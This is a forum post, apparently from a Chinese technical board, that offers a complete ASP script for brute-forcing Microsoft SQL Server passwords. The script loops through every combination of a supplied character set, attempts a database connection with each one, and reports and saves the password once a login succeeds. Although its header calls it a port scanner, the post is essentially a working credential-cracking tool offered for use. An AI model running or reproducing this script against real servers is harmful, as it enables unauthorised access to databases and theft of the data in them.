一个暴力破解MSSQL用户密码的ASP程序,以下这个版本是可以运行之后关闭浏览器,运行完毕将在当前目录生成结果文件的。 CODE: [Copy to clipboard] <% '============ ASP Port Scanner by lake2 =================== 'http://lake2.0x54.org 'Version: 0.1 'For SpringBoard '========================================================== %> <% Dim Password() If Request.Form("go") <> "1" Then %> Welcome to http://lake2.0x54.org <% Else timer1 = timer Server.ScriptTimeout = 7776000 ConnStr = Request.Form("Conn") Char = request.Form("char") LenChar = Len(Char) ReDim password(LenChar) For i = 1 to LenChar password(i) = Mid(Char, i, 1) Next length = CInt(request.Form("len")) Call LAKE("") response.Write "Done! Process " & tTime & " s" If request.Form("CFile") <> "" Then CreateResult("Done!" & vbcrlf & tTime) End If Sub LAKE(str) If Len(str) >= length Then Exit Sub For j = 1 to LenChar pass = str & password(j) If Len(pass) = length Then Call Crack(pass) Call LAKE(pass) Next End Sub Sub Crack(str) On Error Resume Next Set conn = Server.CreateObject("ADODB.connection") conn.open Replace(ConnStr,"{PASS}",str) If Err Then If Err.Number <> -2147217843 Then response.Write(Err.Description & " ") response.End() End If Else response.Write("I Get it ! Password is " & str & " Process " & tTime & " s") If request.Form("CFile") <> "" Then CreateResult(str & vbcrlf & tTime) response.End() End If End Sub Function tTime() timer2 = timer thetime=cstr(int(timer2-timer1)) tTime = thetime End Function Sub CreateResult(t) Set fs = CreateObject("Scripting.FileSystemObject") Set outfile = fs.CreateTextFile(request.Form("path")) outfile.WriteLine t Set fs = Nothing End Sub %> |
|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )
GMT+8, 2024-9-30 23:39 , Processed in 0.196697 second(s), 12 queries , Gzip On, MemCache On.
Powered by Discuz! X3.5
© 2001-2023 Discuz! Team.